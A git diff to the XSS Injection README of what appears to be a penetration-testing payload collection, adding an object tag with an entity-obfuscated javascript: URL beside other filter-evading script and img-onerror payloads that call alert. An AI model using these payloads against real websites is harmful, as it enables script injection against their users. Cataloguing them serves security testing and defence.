diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 92ccfa7..a1ae92c 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -191,6 +191,7 @@ Most tools are also suitable for blind XSS attacks:
 <script>\u0061lert('22')</script>
 <script>eval('\x61lert(\'33\')')</script>
 <script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
+<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
 
 // Img payload
 <img src=x onerror=alert('XSS');>